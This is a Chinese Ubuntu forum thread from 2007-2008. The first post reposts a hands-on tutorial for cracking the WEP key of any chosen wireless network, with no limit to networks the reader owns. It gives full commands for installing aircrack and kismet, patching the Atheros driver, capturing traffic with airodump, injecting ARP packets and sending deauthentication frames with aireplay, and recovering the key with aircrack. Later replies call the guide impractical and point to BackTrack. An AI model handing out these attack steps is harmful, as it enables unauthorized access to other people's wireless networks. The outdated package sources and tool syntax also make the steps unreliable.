Ubuntu破解WEP密钥(转)

Web、Mail、Ftp、DNS、Proxy、VPN、Samba、LDAP 等基础网络服务
回复
iammecn
帖子: 5
注册时间: 2007-05-21 16:38

Ubuntu破解WEP密钥(转)

#1

帖子 iammecn » 2007-05-30 10:44

Ubuntu破解WEP密钥(转)
Submitted by 尖尖角 on 2007, April 27, 12:06 AM. Technical
看了这篇文章,任何人都可以安装和运行 Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出这个东西,现在拿出来和大家分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝,这是目前最流行并且最易于安装的Linux发行版本之一。

第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。

下载Ubuntu LTS

下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

在编辑器中,用以下代码代替其它东西:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

保存文件、退出编辑器。敲入如下命令:

sudo apt-get update

现在我们可以安装后续将会用到的包了:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

接下来你应该更新整个系统,方法是,进入系统菜单——>Administration——>Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。



个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……

我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:

sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci

如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。

sudo gedit /etc/kismet/kismet.conf

把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。

sudo airmon start ath0
sudo kismet

找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

接下来运行airodump。

sudo airodump ath0 filename channel# 1

文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

从airodump 中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要 airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

接下来我们想开始注入数据包。

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:

sudo aireplay -0 ath0 -a BSSID ath0

否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。

sudo aircrack filename.ivs

一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

这做起来一点都不费劲,但可以起作用。
Tags: kernel,
Activer
帖子: 44
注册时间: 2006-11-19 1:27

#2

帖子 Activer » 2007-05-30 17:32

好像非常复杂啊
头像
eexpress
帖子: 58428
注册时间: 2005-08-14 21:55
来自: 长沙

#3

帖子 eexpress » 2007-05-30 20:15

不复杂,多半会出shell的。只是谁确认这个有效而已。
● 鸣学
inwxx
帖子: 3
注册时间: 2007-08-08 17:21

#4

帖子 inwxx » 2007-09-04 12:58

学习中...先谢过了...................................
zclily
帖子: 8
注册时间: 2007-09-01 23:03

#5

帖子 zclily » 2007-09-04 13:41

LZ的方法 适合所以无线网卡吗~ 是不是只有一些网卡才可以
头像
greco
帖子: 2487
注册时间: 2007-04-06 10:24
来自: ~/Shanghai

#6

帖子 greco » 2008-02-14 9:47

破WEP,我一般用backtrack
楼主的文章很不实用,一般人家看了,根本无法破解

推荐各位去 www.aircrack-ng.org 看看,
里面有详细的破解过程.

哦~~~忘了说了, 此网站需要国外代理可上
http://silenceisdefeat.com/~greco

代码: 全选

''.join([chr(ord(c)-2) for c in 'O{"G/ockn"ku<"itgeq0ujkBiockn0eqo'])
echo -n "Z3JlY28uc2hpQGdtYWlsLmNvbQ==" | base64 -d
tuzx
帖子: 9
注册时间: 2007-06-27 9:01

骗分的帖子.我被这帖给害苦了.

#7

帖子 tuzx » 2008-02-14 23:05

买了三个网卡,快2个月都没有弄懂. 两个无线路由器.

建议直接用BT, 步骤很简单大概6步
头像
millenniumdark
论坛版主
帖子: 4159
注册时间: 2005-07-02 14:41
系统: Ubuntu 14.04 (Kylin)
联系:

#8

帖子 millenniumdark » 2008-02-14 23:36

wep的安全性,實在是太糟糕了。
jimmin
帖子: 2138
注册时间: 2006-09-24 4:37

#9

帖子 jimmin » 2008-02-15 0:02

标记,也许以后有用。 :D
kevinduan
帖子: 15
注册时间: 2008-03-14 10:46

#10

帖子 kevinduan » 2008-05-30 0:56

貌似很复杂了样子。我的网卡是IPW3945。目前还不知道怎么弄。慢慢学习中......
头像
zengdesheng
帖子: 92
注册时间: 2006-11-05 10:43

#11

帖子 zengdesheng » 2008-06-01 0:57

没有无线网络可以尝试。。。
:cry:
头像
sa.net
帖子: 62
注册时间: 2008-04-26 11:41
来自: 广东广州

#12

帖子 sa.net » 2008-06-06 12:06

Windows下也有工具破解吧.
Cygwin中国镜像 ====== 图片生成:http://www.makepic.com/ +++ +++ +++ +++ +++ +++ +++ +++ +++ +++ 图片
头像
mawith
帖子: 1288
注册时间: 2007-10-21 16:41
来自: GD

#13

帖子 mawith » 2008-06-06 13:17

sa.net 写了:Windows下也有工具破解吧.
听说BT2可以在十多分钟内就破了哟。。
win下的楼主能找到么??
吼吼
fleeking
帖子: 230
注册时间: 2008-04-30 12:34

#14

帖子 fleeking » 2008-06-07 21:27

mark 留名
回复